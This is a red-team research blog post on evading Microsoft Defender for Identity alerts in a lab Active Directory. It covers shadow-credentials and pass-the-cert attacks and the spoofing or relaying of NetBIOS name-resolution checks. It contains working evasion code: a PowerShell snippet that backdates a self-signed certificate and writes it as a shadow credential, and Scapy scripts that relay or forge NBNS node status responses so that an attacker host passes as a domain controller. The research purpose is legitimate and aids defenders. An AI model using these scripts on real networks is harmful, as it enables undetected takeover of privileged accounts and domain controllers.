Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026

Introduction

When it comes to working with Microsoft Defender for Identity (DfI) from an offensive perspective, for instance during a red team assessment, research has already been conducted that highlights detection and evasion possibilities for different alerts. Research was previously done by Synacktiv, for example, for one of the pass-the-cert alerts (“Suspicious certificate usage over Kerberos protocol (PKINIT)”), multiple reconnaissance alerts, alerts for kerberoasting, AS-REP roasting and golden-ticket attacks.

The first part of this blogpost summarizes the research conducted at cirosec during the last few weeks on DfI’s detection capabilities for high-impact attacks on Active Directory like shadow-credentials, pass-the-cert, ESC8 and DCSync, and on their respective evasion possibilities. It also introduces one of DfI’s main components, called “Network Name Resolution”, which is vulnerable to spoofing and relaying in DfI version 2.2, allowing multiple alerts to be evaded. The differences between the DfI versions 2.2 and 3.0 are pointed out and demonstrated.

The second part of the blogpost will show options for the blue teamer’s perspective and offer alternative possibilities to detect some of the attacks that were performed while using DfI evasion. If you are interested in this, the blogpost can be found here: Microsoft Defender for Identity evasions in 2026 – Part II

The term “evasion” is used in two ways in this blogpost. The first is when no detection logic exists for a part of an attack, so that DfI does not alert at all. The second is when an attack is performed while actively misleading the existing detection logic to evade the alert.

Defender for Identity – architecture and overview

Microsoft DfI is one of the main components of the Microsoft Defender XDR solution besides other security products like Microsoft Defender for Endpoint and Defender for Office 365. DfI aims to help organizations to detect identity-related attacks across on-premises Active Directory. To accomplish that task, DfI collects different signals from the network through its agents, which are placed at the most critical Windows servers. The identity signals gathered by these agents are transferred into the Microsoft Defender XDR portal, where a correlation of these signals with data from other products like Defender for Endpoint happens, which can highlight ongoing attacks, starting from one endpoint, going across the domain against sensitive targets like domain controllers.

Figure 1: Microsoft Defender XDR (https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview)

The following Windows server roles are currently supported for DfI deployment:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

Laboratory setup

Figure 2: Lab setup
Jakob Scholz

Consultant


The initial lab setup contains two domain controllers (DC), one running DfI version 2.2 and one running version 3.0, as well as a certificate authority (CA). Besides that, there are two clients: a domain-joined Windows workstation called PC02 and a Kali client that is not domain joined. Both clients represent an attacker on the network. Having domain controllers with the two different DfI versions makes it possible to test against both of them.

The alerts covered in this blogpost don’t have a learning period, meaning there is no baseline of normal and abnormal network activity that must be learned over a given time. They are based on “static” conditions, so the alerts work from the beginning of the setup. Whether an alert has a learning period is shown in the DfI documentation here, at least for alerts classified as “DfI classic alerts”. Microsoft is moving the DfI classic alerts to “DfI XDR Alerts” in an ongoing transition, and less information is provided for those.

Another aspect to consider is the endpoint where attacks are carried out. Since Defender XDR correlates information between its different security products, it can even detect attacks that are evaded “DfI-wise”, for instance when the corresponding tool to perform an attack is recognized at an endpoint that is monitored through Defender for Endpoint. Since the focus was on DfI only, in the lab, PC02 is set up without Defender for Endpoint.

All of the results shown in this blogpost were generated between November 1, 2025 and February 1, 2026 and are based on the laboratory setup, which does not represent an enterprise environment. Therefore, DfI and the results may behave differently in a production environment.

Shadow credentials

Attack overview

The shadow-credentials attack makes use of the msDS-KeyCredentialLink (KCL) attribute. This attribute can be used to store public keys and link them to the corresponding user or computer object, allowing for Kerberos authentication. When an attacker gets into a position where he can write the KCL attribute for another user or computer, he can essentially store his own public key there, making it possible to authenticate with the certificate as these entities. The authentication is done over the Kerberos extension for “Public Key Cryptography for initial authentication” (PKINIT) by presenting the certificate. The following weaknesses and evasion options occur in DfI versions 2.2 and 3.0.

General detection requirements

Regarding alerting, there are two different alerts, and three scenarios must be distinguished when looking at DfI’s detection capabilities. The scenarios differ in which entity sets a shadow credential for which other entity. The relevant difference is the target type, i.e. whether it’s a user object or a computer object.

A general requirement for DfI to identify a shadow-credentials attack is the correct auditing on the domain controllers. The event 5136 “A directory service object was modified” is required in order to make DfI capable of knowing that the KCL attribute, where the public key (shadow credential) is stored, was modified.

User to user

In the first scenario, a user is able to set a shadow credential for another user. There seems to be nearly no detection logic for this. A user can set a shadow credential for another user, except for the AD built-in administrator (S-1-5-<domain>-500), without raising the alert.

When setting a shadow credential (in this case for the built-in administrator (S-1-5-<domain>-500)), event 5136 is logged first and then evaluated by DfI:

Figure 3: Shadow credential – event 5136

If done for the built-in administrator, the alert for setting a shadow credential is raised:

Figure 4: Shadow credential alert: Suspected account takeover using shadow credentials

For all other kinds of user objects – even when high privileged through group membership – shadow credentials can be set without alerting DfI. In the tests, the users for which a shadow credential has been set were members of the following groups:

  • Administrators
  • Domain Admins
  • Enterprise Administrators
  • Group Policy Creator Owners
  • Schema Admins

User to computer

The second scenario to consider is writing a shadow credential from the user context to a computer object. Here, a distinction between sensitive and non-sensitive computer objects can be made. Computer objects that are treated as sensitive, and for which setting a shadow credential raises an alert immediately, are Windows servers with the following roles:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

This list is not exhaustive, and more server roles could be affected. But regular workstations that don’t hold a Windows server role seem to be classified as non-sensitive by Microsoft, and shadow credentials can be set without any alerting.

Computer to computer

An attacker can combine authentication coercion with NTLM relaying to authenticate as a foreign computer, which makes it possible to write shadow credentials for the impersonated computer. This works because computer objects have the legitimate right to edit their own KCL attribute.

In a coercion attack, a third-party machine account can be forced to authenticate via NTLM to a target of the attacker’s choosing. The attacker can forward this authentication information to another target via NTLM relaying and can thus impersonate the relayed machine account. Extensive information about these two attack techniques can be found in the following two blogposts: NTLM Relay and The Ultimate Guide to Windows Coercion Techniques in 2025.

The context here is different from writing a shadow credential from a user identity to a computer: A machine account is writing the shadow credential for itself, and a legitimate mechanism exists that does the same. This may be the reason why no shadow-credentials alert is raised when setting one for a sensitive computer object like a DC or a CA through NTLM relaying. Windows supports “domain-joined device public key authentication”, which allows a computer to perform Kerberos authentication using key trust. When certain requirements are met, such as the device running Credential Guard or having a TPM, the device can create a key pair and store the public key in its KCL attribute.

When performing the attack, it must be kept in mind that DfI has alerts targeting NTLM-relaying and authentication-coercion attacks. But as described, there is no detection for the shadow-credentials attack itself in the NTLM relay scenario, where the identity of the computer object is used to write the shadow credential to that same computer.

Shadow-credentials alert through PKINIT

The second alert that can be triggered in the context of a shadow-credentials attack is called “Shadow Credential Added to Account and used for Authentication”. This alert depends on another alert, namely the alert: “Suspicious certificate usage over Kerberos protocol (PKINIT)”. This alert is triggered when DfI detects that the usage of a certificate over the PKINIT extension is done by an attacker, namely as pass-the-cert attack, which is explained in the next section. When redeeming the set shadow credential to retrieve a Ticket Granting Ticket (TGT), which is done over the PKINIT extension of the Kerberos protocol, the set shadow credential can be detected retroactively by detecting the pass-the-cert attack. This extends the possibilities to detect shadow credentials set to user objects, which, as said previously, was nearly impossible. But the problem with this alert is that it depends on another alert, which makes it less robust. In summary, someone who can evade the alert for “Suspicious certificate usage over Kerberos protocol (PKINIT)” will automatically evade the alert for “Shadow Credential Added to Account and used for Authentication”.

Pass-the-cert attack

Attack overview

Having obtained a certificate through a shadow-credentials attack or an ADCS-ESC vulnerability, an attacker can use this certificate to request a TGT, authenticating him as the victim in whose context the certificate was created. The ADCS-ESC vulnerabilities refer to a range of misconfigurations possible in Active Directory Certificate Services. See the SpecterOps whitepaper Certified Pre-Owned for more information.

Reviewing existing evasion possibility

DfI comes with detection logic for this attack, in which it tries to determine whether an offensive tool like Rubeus was used to build the Authentication Service request (AS-REQ). The AS-REQ is the initial Kerberos message sent by a client to the Key Distribution Center (KDC) to request a TGT and initiate the authentication process. The detection looks at how the ticket was requested. Synacktiv researched the respective alert “Suspicious certificate usage over Kerberos protocol (PKINIT)” and found that the indicators DfI uses to tell whether an AS-REQ was built in a legitimate way or by an attack tool are the eTypes. The eTypes are the supported encryption types the client suggests for encrypting the Kerberos tickets. Those suggested by Rubeus when building an AS-REQ are unique, making it easy for DfI to fingerprint that Rubeus was used.

The eTypes that are common in legitimate applications and can be used to bypass this alert are listed in Synacktiv’s blogpost here. The evasion was still working at the time of writing this article in March 2026 for DfI versions 2.2 and 3.0. The following Wireshark dump shows the AS-REQ when built with an adjusted version of Rubeus, using legitimate eTypes:

Figure 5: AS-REQ with legitimate eTypes

Taking a deeper look at the detection logic

Interestingly, this tool-based detection, where DfI tries to figure out whether an AS-REQ is suspicious by inspecting the eTypes, is only the second part of the detection chain for this alert. Before DfI investigates the suggested eTypes, it checks whether the certificate was created within the last two hours. This is done using the NotBefore value inside the certificate, which indicates the date from which the certificate is valid. The tool-based detection is only applied to certificates created during the last two hours. If the NotBefore value indicates that the certificate is older than two hours, DfI does no further investigation, even if an unmodified version of Rubeus with its standard, fingerprintable eTypes is used.
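The two-stage chain described above can be modelled in a few lines of Python. This is only a sketch of the behaviour observed in the lab, not DfI's actual implementation. The function names, the strict comparison at exactly two hours and the boolean eType flag are assumptions made for illustration.

```python
from datetime import datetime, timedelta, timezone

# Assumption: the two-hour window is taken from the lab observations.
INSPECTION_WINDOW = timedelta(hours=2)


def etype_check_applies(not_before: datetime, request_time: datetime) -> bool:
    """Return True if the certificate is recent enough for the eType check to run."""
    return request_time - not_before < INSPECTION_WINDOW


def pkinit_alert_expected(not_before: datetime, request_time: datetime,
                          etypes_look_like_tool: bool) -> bool:
    """Model of the chain: certificate age gate first, eType fingerprint second."""
    if not etype_check_applies(not_before, request_time):
        return False  # certificate looks older than two hours: no further inspection
    return etypes_look_like_tool


now = datetime(2026, 1, 15, 12, 0, tzinfo=timezone.utc)
fresh = now - timedelta(minutes=10)   # NotBefore of a freshly issued certificate
old = now - timedelta(hours=3)        # NotBefore that lies more than two hours back

print(pkinit_alert_expected(fresh, now, etypes_look_like_tool=True))
print(pkinit_alert_expected(old, now, etypes_look_like_tool=True))
```

In this model, a request with tool-like eTypes only leads to an alert while the certificate still falls inside the two-hour window.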

Shadow credentials and PKINIT

Awareness of that behaviour opens up another attack vector. If someone could modify the NotBefore value of a certificate that is used for Kerberos client authentication, they could bypass the whole detection chain. Certificates gained through ADCS-ESC-related attacks, e.g. ESC1, are signed by the CA and cannot be modified without breaking the signature, which would result in the certificate being rejected by the KDC when requesting the TGT. But for a self-signed certificate, which results from setting a shadow credential, the NotBefore value can be set to a value in the past, making it look like the certificate was created earlier. This can be done with Michael Grafnetter’s DSInternals PowerShell module and the following code snippet from here. It makes it possible to write a shadow credential while keeping control over the self-signed certificate. The following part of the script generates a self-signed certificate:

$upn = 'ADM@jsc.lab'
$ownerDN = 'CN=ADM,OU=Test_User,DC=jsc,DC=lab'
$userSid = 'S-1-5-21-1605340795-4164095229-358834758-7125'
$deviceID = (New-Guid)
$certificateSubject = '{0}/{1}/{2}' -f $userSid, $deviceID, $upn

# Backdate NotBefore so that the certificate does not look freshly created
$certificate = New-SelfSignedCertificate -Subject $certificateSubject `
      -KeyLength 2048 `
      -Provider 'Microsoft Strong Cryptographic Provider' `
      -CertStoreLocation Cert:\CurrentUser\My `
      -NotBefore (Get-Date).AddHours(-2) `
      -NotAfter (Get-Date).AddYears(30) `
      -TextExtension '2.5.29.19={text}false', '2.5.29.37={text}1.3.6.1.4.1.311.20.2.2' `
      -SuppressOid '2.5.29.14' `
      -KeyUsage None `
      -KeyExportPolicy Exportable

The relevant part for the evasion is to set the NotBefore parameter to a value in the past:

-NotBefore (Get-Date).AddHours(-2)

After the creation of the certificate, a key credential link can be extracted from it, suitable to be set in the KCL attribute as a shadow credential:

$ngcKey = Get-ADKeyCredential -Certificate $certificate -DeviceId $deviceID -OwnerDN $ownerDN -CreationTime (Get-Date)

Set-ADObject -Identity $ngcKey.Owner -Add @{'msDS-KeyCredentialLink' = $ngcKey.ToDNWithBinary()}

As discussed in the section about shadow credentials, in part “Shadow-credentials alert through PKINIT”, the creation of a shadow credential can be detected through the subsequent authentication against the KDC when DfI classifies the authentication as malicious, which then also results in the alert for shadow credentials. As shown in this section, the pass-the-cert alert can also be bypassed by waiting two hours or making the certificate look like it’s older than two hours, but this only applies to self-signed certificates. Eventually, this makes it possible to evade the pass-the-cert alert when creating shadow credentials, which also results in evading the alert for setting the shadow credential.

Network Name Resolution (NNR)

Network Name Resolution (NNR) is a core component for several alerts to work, but is vulnerable to spoofing and relaying, making it possible to evade multiple alerts.

The DfI documentation describes NNR as follows:
“Using NNR, Defender for Identity can correlate between raw activities (containing IP addresses), and the relevant computers involved in each activity. Based on the raw activities, Defender for Identity profiles entities, including computers, and generates security alerts for suspicious activities”.

NNR works by requesting the NetBIOS host and domain name as well as the DNS name from the IP address, from where a potential attack occurred, using three different primary methods:

  • NTLM over RPC (TCP port 135)
  • NetBIOS (UDP port 137)
  • Remote desktop protocol (TCP port 3389)

There also exists a secondary method, which is used if there is no response from any of the primary methods or if there’s a conflict in the responses received from two or more primary methods. The secondary option makes use of DNS. The DfI agent will make a reverse DNS lookup of the IP address to get the hostname of the machine.
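The interplay of primary and secondary methods can be summarised in a small Python model. It is a simplified sketch of the documented behaviour (use the primary answers if they agree, otherwise fall back to reverse DNS). The function name, the dictionary layout and the case-insensitive comparison are assumptions, not DfI internals.

```python
from typing import Dict, Optional


def resolve_hostname(primary: Dict[str, Optional[str]],
                     reverse_dns: Optional[str]) -> Optional[str]:
    """Pick a hostname from NNR answers.

    primary maps a method name to the hostname it returned (None = no response).
    reverse_dns is the result of the secondary method, if any.
    """
    answers = {name.upper() for name in primary.values() if name}
    if len(answers) == 1:
        return answers.pop()  # all responding primary methods agree
    # No primary answer at all, or conflicting answers: use the secondary method
    return reverse_dns.upper() if reverse_dns else None


# Only NetBIOS answered: its value is used
print(resolve_hostname({"netbios": "PC02", "rpc": None, "rdp": None}, "pc02.jsc.lab"))
# Two primary methods disagree: reverse DNS decides
print(resolve_hostname({"netbios": "PC02", "rpc": "DC02", "rdp": None}, "pc02.jsc.lab"))
```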

By using these methods, DfI can tell the origin of the suspicious traffic and map it to a computer hostname, making it possible to distinguish between an attack or legitimate behavior. How knowing the hostname of the suspicious computer helps DfI determine if an attack occurred is explained in the next section using one alert whose detection logic is based on NNR.

NNR in action: Suspected suspicious Kerberos ticket request

To illustrate the inner workings of NNR and its weakness, the example of obtaining TGTs with certificates is continued. Besides the already discussed alert “Suspicious certificate usage over Kerberos protocol (PKINIT)”, there is another alert that can be raised when requesting a TGT by presenting a certificate via PKINIT. This alert is called “Suspected suspicious Kerberos ticket request” and has an interesting scope. The research has shown that it is only applied when trying to authenticate as a domain controller machine account using a certificate.

For this example, it is assumed that the adversary is on PC02.jsc.lab (172.16.94.11) and has managed to get a certificate valid for DC02 that allows Kerberos client authentication, for instance through shadow credentials or an ADCS-ESC vulnerability. When the attacker on PC02 uses the certificate to authenticate as DC02$ against DC01.jsc.lab, the DfI agent on DC01 sends NNR requests to the source IP address from which the AS-REQ for DC02 originated, which is 172.16.94.11. This is done to determine whether DC02 is actually at this IP address. The described flow is illustrated in the following image:

Figure 6: NNR flow

The only information the DfI agent has before starting the investigation using NNR is an AS-REQ requesting a TGT for DC02 and the source IP address of the suspicious machine. The AS-REQ provides a valid certificate with the subject DC02$, indicating that the certificate belongs to DC02$. The requester has also sent the signed timestamp, giving proof of possession of the private key.

Figure 7: AS-REQ DC02$

Therefore, it makes sense to have a detection logic for that kind of request. An AS-REQ for a domain controller machine account must originate from the source IP address of the respective domain controller, in the case of Kerberos authentication. If a TGT for a domain controller machine account is requested from a machine that is not the domain controller itself, as indicated by network attributes such as IP address and hostname, this strongly indicates that an adversary has obtained a valid certificate, which would be explainable through attacks like shadow-credentials or ADCS-ESC-related attacks.

Inspection of NNR primary methods

Continuing with the example from above, specific actions are happening on DC01 and PC02 when the attacker performs an AS-REQ for DC02 against the KDC on DC01 starting from PC02. The DfI agent’s reaction on DC01 (172.16.94.1) to the incoming AS-REQ is inspected using Procmon:

Figure 8: DfI sensor process performing NNR

“Microsoft.Tri.Sensor.exe” is the relevant process of DfI, which performs the NNR. The first two entries 1.) and 2.) are requests and responses to PC02 using NetBIOS – UDP port 137. Entries 3.), 4.), 5.) and 6.) are responsible for the NNR method using the endpoint mapper – TCP port 135. Entry 7.) uses RDP – TCP port 3389.  

When monitoring PC02, the incoming NNR requests can be noticed, where each source port can be mapped to the source ports in figure 8:

Figure 9: NBNS node status request

The NetBIOS request from the DfI agent to port 137 on PC02 can be noticed in figure 9. Furthermore, we can see the request at the DCE/RPC endpoint mapper on TCP port 135:

Figure 10: NTLM over RPC

Eventually, there is the connection to RDP on TCP port 3389:

Figure 11: RDP

NNR method: NetBIOS node status request

The NetBIOS request sent by DfI is a so-called NetBIOS node status request, which is a unicast request to retrieve NetBIOS-related information about an endpoint. The NetBIOS node status response from PC02 contains its NetBIOS hostname, the NetBIOS domain name and the NetBIOS service type. The hostname and domain name are the relevant information used by the DfI agent to answer the previous question of whether the computer with IP address 172.16.94.11 (PC02) is in fact DC02. Since PC02 is not DC02, the NetBIOS-related information from PC02 will lead DfI to alert on this attack.

Figure 12: NetBIOS node status response (PC02)

The three highlighted areas in figure 12 contain the discussed information that is essential for the detection logic. Each entry corresponds to a registered name, which are three in total. The first name “JSC<00> (Workstation/Redirector)” states that the NetBIOS domain name is “JSC”, and the service type is 0x00, which represents a workstation. The two other names just differ in the service types, while 0x20 indicates a file service. “PC02<00> (Workstation/Redirector)” indicates the NetBIOS hostname is “PC02”.
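To make the structure of the name table more tangible, the following Python sketch parses the name entries of a node status response with the standard library only. It assumes the RFC 1002 layout (a one-byte name count followed by 18-byte entries consisting of a 15-byte name, a one-byte suffix and 16-bit flags with the group bit 0x8000). The sample bytes are hand-built to mirror the three names discussed above and are not taken from the capture.

```python
import struct

GROUP_FLAG = 0x8000  # G bit of NAME_FLAGS (RFC 1002): set for group names


def parse_node_names(data: bytes):
    """Parse NUM_NAMES followed by 18-byte entries (15-byte name, suffix, flags)."""
    count = data[0]
    entries = []
    for i in range(count):
        offset = 1 + i * 18
        raw_name, suffix, flags = struct.unpack_from("!15sBH", data, offset)
        entries.append({
            "name": raw_name.decode("ascii").rstrip(),
            "suffix": suffix,
            "group": bool(flags & GROUP_FLAG),
        })
    return entries


def build_entry(name: str, suffix: int, flags: int) -> bytes:
    """Hypothetical helper that builds one name entry for the hand-made sample."""
    return name.ljust(15).encode("ascii") + struct.pack("!BH", suffix, flags)


# Hand-built sample: domain name (group), hostname as workstation and as file service
sample = (bytes([3])
          + build_entry("JSC", 0x00, 0x8400)
          + build_entry("PC02", 0x00, 0x0400)
          + build_entry("PC02", 0x20, 0x0400))

for entry in parse_node_names(sample):
    print(entry)
```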

The NetBIOS request generated by DfI can also be triggered by using the native Windows tool nbtstat by using nbtstat -A <ip>. The result can be seen in the following image, containing the same information as when inspecting the NetBIOS request through Wireshark:

Figure 13: NetBIOS node status request using nbtstat
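For readers who want to trigger the same request without nbtstat, the following Python sketch builds a NetBIOS node status request using only the standard library. It assumes the RFC 1001/1002 wire format (wildcard name "*", question type NBSTAT 0x0021). The helper query_node_status and its timeout are hypothetical and only show how the packet could be sent to UDP port 137.

```python
import random
import socket
import struct


def build_node_status_request(transaction_id: int) -> bytes:
    """Build a node status (NBSTAT) query for the wildcard name '*'."""
    # Header: ID, flags (plain query), QDCOUNT=1, ANCOUNT=NSCOUNT=ARCOUNT=0
    header = struct.pack("!HHHHHH", transaction_id, 0x0000, 1, 0, 0, 0)
    # Wildcard name padded with NUL bytes to 16 bytes, then first-level encoded:
    # every byte is split into two nibbles, each added to ord('A')
    raw_name = b"*" + b"\x00" * 15
    encoded = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw_name)
    question = bytes([len(encoded)]) + encoded + b"\x00"
    # QTYPE 0x0021 = NBSTAT (node status), QCLASS 0x0001 = IN
    return header + question + struct.pack("!HH", 0x0021, 0x0001)


def query_node_status(ip: str, timeout: float = 2.0) -> bytes:
    """Hypothetical helper: send the request to UDP port 137, return the raw reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        request = build_node_status_request(random.randint(0, 0xFFFF))
        sock.sendto(request, (ip, 137))
        return sock.recvfrom(1024)[0]


request = build_node_status_request(0x1234)
print(len(request), request.hex())
```

Calling query_node_status("172.16.94.11") from a machine in the lab would send this request to PC02, provided UDP port 137 is reachable.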

The alert can even be inspected before appearing in the Defender XDR portal, by looking into the local logging files. These are stored at “C:\Program Files\Azure Advanced Threat Protection Sensor\2.255.XXXXX.XXXXX\Logs\Microsoft.Tri.Sensor.log” at the DC. The collected information can be found in the log file:

Figure 14: Alert: “Suspected suspicious Kerberos ticket request” in logs

The log file indicates an alert triggered by the use of a certificate for one machine account on another computer. The highlighted items “CertificateSubject=DC02$” and “SourceAccountName=jsc.lab\DC02$” are the information extracted from the AS-REQ and the provided certificate. “SourceComputerName=DomainName=JSC Name=PC02” is obtained from the NetBIOS node status response. These are the key values for the detection logic. If the NetBIOS hostname and NetBIOS domain name don’t match the certificate subject and account name, like in this case, the alert is raised. If the values match, no alert will be raised.
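The comparison described above can be sketched as follows. This is a simplified model based on the values visible in the log file. How DfI normalises the names internally is not known, so the parsing of the account name and the case-insensitive comparison are assumptions, and the domain name comparison is left out because the mapping between “jsc.lab” and “JSC” is not documented.

```python
def account_to_hostname(source_account: str) -> str:
    """Turn an account name such as 'jsc.lab\\DC02$' into the hostname 'DC02'."""
    return source_account.split("\\")[-1].rstrip("$").upper()


def ticket_request_alert(source_account: str, resolved_host: str) -> bool:
    """Return True if the name resolved via NNR does not match the requested account."""
    return account_to_hostname(source_account) != resolved_host.strip().upper()


# Values from the log: the request is for DC02$, but NNR resolves the sender to PC02
print(ticket_request_alert("jsc.lab\\DC02$", "PC02"))
# If the sender appears to be DC02, the model raises no alert
print(ticket_request_alert("jsc.lab\\DC02$", "DC02"))
```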

Evasion using NetBIOS

Since the detection logic for the alert “Suspected suspicious Kerberos ticket request” was uncovered, evasion possibilities can be considered.

There are two possibilities to evade the alert or more generally, to manipulate NNR. The first is to spoof a NetBIOS response to the DfI agent directly by specifying the needed NetBIOS information and answering the NetBIOS node status request. The other option is to take the incoming NetBIOS request from the DfI agent, relay it to the desired target and relay the response back to the DfI agent.

Relaying the NetBIOS node status request

To understand the relaying of the NetBIOS request, refer to the following two diagrams:

Figure 15: AS-REQ
Figure 16: Relaying of NetBIOS node status request/response

After the TGT request (1 & 2), DfI starts using NNR and asks the sender for its NetBIOS node status (3). A malicious actor can relay the NetBIOS request to the machine the TGT would belong to, which is DC02 in the example (4). The response from DC02 can be relayed back via PC02 to DC01 (6). This evades the detection, since the AS-REQ and the certificate indicate DC02$ as the subject and, from the perspective of the DfI agent on DC01, the NetBIOS information from the machine that performed the AS-REQ seems to match DC02.

The relaying of the NetBIOS method can be performed in a PoC using the Python library Scapy.

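from scapy.all import IP, UDP, NBNSHeader, send, sr1

def relay_nbns_node_status_request(pkt):
    # IP addresses of the DfI agent (DC01) and of the relay target (DC02)
    dc01_ip = "172.16.94.1"
    dc02_ip = "172.16.94.4"
    # Source port and NBNS payload of the node status request sent by DC01
    udp_src_port = pkt[UDP].sport
    dc01_nbns_node_status_request = pkt[NBNSHeader]

    # Forward the request to DC02 and wait for its node status response
    dc02_nbns_node_status_response = sr1(
        IP(dst=dc02_ip)/UDP()/dc01_nbns_node_status_request)

    # Send the NBNS part of DC02's response back to the DfI agent on DC01
    dc02_nbns_node_status_response = dc02_nbns_node_status_response[NBNSHeader]
    send(IP(dst=dc01_ip)/UDP(dport=udp_src_port)/dc02_nbns_node_status_response)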

The function takes a network packet as argument (pkt), which must be sniffed beforehand; this can be done with Scapy. In the first block, the relevant IP addresses and the UDP source port from which the packet originated are saved, and the NetBIOS node status request from DC01 is extracted.

The second block builds the NetBIOS node status request for DC02, sends it to DC02 and also receives the response – the NetBIOS node status response. The last block builds the response to DC01 and sends it.

When using nbtstat on DC01 again to retrieve the NetBIOS information from PC02, it can be seen that it was possible to successfully tamper with the NetBIOS node status request. PC02 (172.16.94.11) is now appearing to be DC02.

Figure 17: Tampered NetBIOS node status response PC02 (relayed)

This way to perform the evasion using relaying has some advantages, but also certain disadvantages when compared with the second method, which will be presented next.

First of all, the evasion is fast and straightforward this way, because there is no need to care about individual values such as the NetBIOS hostname and NetBIOS domain name: the NetBIOS node status request is answered directly by the correct target. This also has the advantage that the response is fully accurate, whereas a manually spoofed NetBIOS node status response may leave values that are not important to the evasion ignored or overlooked, potentially generating indicators of compromise (IOCs). One example, visible in the image above, is the MAC address. It is not critical to DfI’s detection logic and is therefore easy to ignore when manually crafting a NetBIOS node status response, but a mismatching value could in theory serve as an IOC.

The biggest disadvantage of this approach is that it depends on the availability of a port on another target (in this case another DC), here UDP 137, to retrieve its NetBIOS information. When it’s not possible to reach the target on UDP port 137, for instance due to firewalling or network issues, no NetBIOS information can be relayed back to the initial requester, and the evasion fails. Therefore, the manual crafting of NetBIOS node status responses is discussed, too.

Spoofing the NetBIOS node status response

While there is a technical difference between relaying a request to receive a correct response and building the correct response oneself, the result is essentially the same: a spoofed response is sent. This section discusses how to build a spoofed NetBIOS node status response for DfI that contains the relevant information. This can also be done by using Scapy:

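from scapy.all import IP, UDP, NBNSHeader, rdpcap, send

def send_spoofed_nbns_node_status_response(pkt):
    # Load a previously captured node status response from PC02 as a template
    sample_nbns_node_status_response = rdpcap(r"PC02_nbns_node_status_response.pcap")[0]
    # Sender (DfI agent), UDP source port and transaction ID of the incoming request
    dfi_agent_ip = pkt[IP].src
    udp_src_port = pkt[UDP].sport
    transaction_id = pkt[UDP][NBNSHeader].NAME_TRN_ID

    # Reuse the NBNS part of the sample and match the request's transaction ID
    spoofed_nbns_node_status_response = sample_nbns_node_status_response[NBNSHeader]
    spoofed_nbns_node_status_response.NAME_TRN_ID = transaction_id
    # NetBIOS names are 15 characters, padded with spaces (the 16th byte is the suffix)
    spoofed_netbios_host_name = 'DC02'.ljust(15, " ")
    spoofed_netbios_domain_name = 'JSC'.ljust(15, " ")

    # Overwrite unique names with the hostname and group names with the domain name
    for index, nbns_entry in enumerate(spoofed_nbns_node_status_response.NODE_NAME):
        if nbns_entry.NAME_FLAGS == 0x04:  # UNIQUE
            spoofed_nbns_node_status_response.NODE_NAME[index].NETBIOS_NAME = spoofed_netbios_host_name
        elif nbns_entry.NAME_FLAGS == 0x84:  # GROUP
            spoofed_nbns_node_status_response.NODE_NAME[index].NETBIOS_NAME = spoofed_netbios_domain_name

    send(IP(dst=dfi_agent_ip)/UDP(dport=udp_src_port)/spoofed_nbns_node_status_response)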

As a basis, a sample of a NetBIOS node status response from PC02 was captured and saved as PCAP file. This file can be loaded and used for further processing. Besides, the UDP source port and the transaction ID of the incoming request are saved.

In the second block, the node status response is adjusted with the correct transaction ID, and the spoofed NetBIOS names are prepared. The NetBIOS names are specified as 16 bytes fixed length, padded with spaces, while the last byte is the suffix for the service type that is already set in the sample. The last block adjusts the NetBIOS node status response to use the spoofed NetBIOS names.

The result can be seen in the comparison below: the left image shows the original NetBIOS node status from PC02, and the right image shows the spoofed response that was generated with the script. The NetBIOS domain name stays “JSC” since it was already set.

Figure 18: Original node status PC02
Figure 19: Spoofed node status PC02

When inspecting the result of the spoofed response, differences can be noticed between the spoofed and the relayed attempt. When relaying is used, there is one more registered NetBIOS name. The entry “JSC <1C> GROUP Registered” is missing when the DC02 node status response is spoofed with the previous script. An entry with the service type 1C indicates that the node is a domain controller inside the domain (JSC). This looks like a relevant criterion for DfI when it comes to telling whether a request originates from a domain controller, as is the case for the alert “Suspected suspicious Kerberos ticket request”, but it is not. The alert has the limited scope of identifying a suspicious TGT request for a domain controller machine account that was not sent from the DC itself. It is not relevant whether the node is registered as domain controller inside the domain; the evasion works by just spoofing the correct NetBIOS hostname and domain name. This may be explained by the fact that the two other NNR methods cannot indicate through a single raw value whether an endpoint is registered as a domain controller, as the NetBIOS node status can. Additionally, the detection logic is designed to work with just one NNR method active in the environment, which means that every method must be able to detect all threats independently of the other NNR methods, but with the same reliability.

Figure 20: Tampered NetBIOS node status response PC02 (relayed)

Additional considerations when evading NNR

Windows endpoint considerations

To perform an evasion when working with NNR, two more things must be considered beyond spoofing the NetBIOS node status response. First, DfI must not receive any NNR responses from the actual operating system (OS) of the machine the attacker uses for the attack and the evasion. When performing the evasion technique with the provided scripts, there would otherwise be a race condition between the script-generated, spoofed response and the OS-generated, legitimate response. To avoid the race condition, incoming traffic to the destination ports used for NNR can be blocked on the attacker machine. The Windows firewall allows rules to be created for incoming traffic, but local administrator privileges are required to modify it. Scapy relies on Npcap, which allows traffic to be sniffed and injected on the network interface independently of the Windows OS and therefore of the firewall, too. Using that approach, it’s possible to send spoofed NNR responses to the DfI agent while preventing the Windows OS from answering the NNR requests.

The second consideration is the two other NNR methods. According to the NNR documentation, it is recommended to open at least one of the related ports on all devices in the environment when configuring DfI, so that at least one primary method works. This means DfI can perform detection when only one of the NNR methods is answered, which makes it possible to respond to the NetBIOS method only and ignore the two others. This can also be done by blocking the required ports on the attacker machine.
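As a rough illustration of the port blocking described above, the following Python sketch only builds the corresponding `netsh advfirewall` commands and prints them; it does not execute anything. The rule name prefix and the helper `block_rule_commands` are hypothetical, and the port list is simply the three primary NNR methods named in this post.

```python
# Ports of the three primary NNR methods as named in this post.
NNR_PORTS = [
    ("UDP", 137, "NetBIOS node status"),
    ("TCP", 3389, "RDP Client Hello"),
    ("TCP", 135, "NTLM over RPC"),
]


def block_rule_commands(prefix: str = "block-nnr") -> list:
    """Build one inbound block rule per NNR port (rule names are hypothetical)."""
    commands = []
    for proto, port, _label in NNR_PORTS:
        commands.append(
            f'netsh advfirewall firewall add rule name="{prefix}-{proto.lower()}-{port}" '
            f"dir=in action=block protocol={proto} localport={port}"
        )
    return commands


# Print the commands; running them requires local administrator privileges.
for command in block_rule_commands():
    print(command)
```

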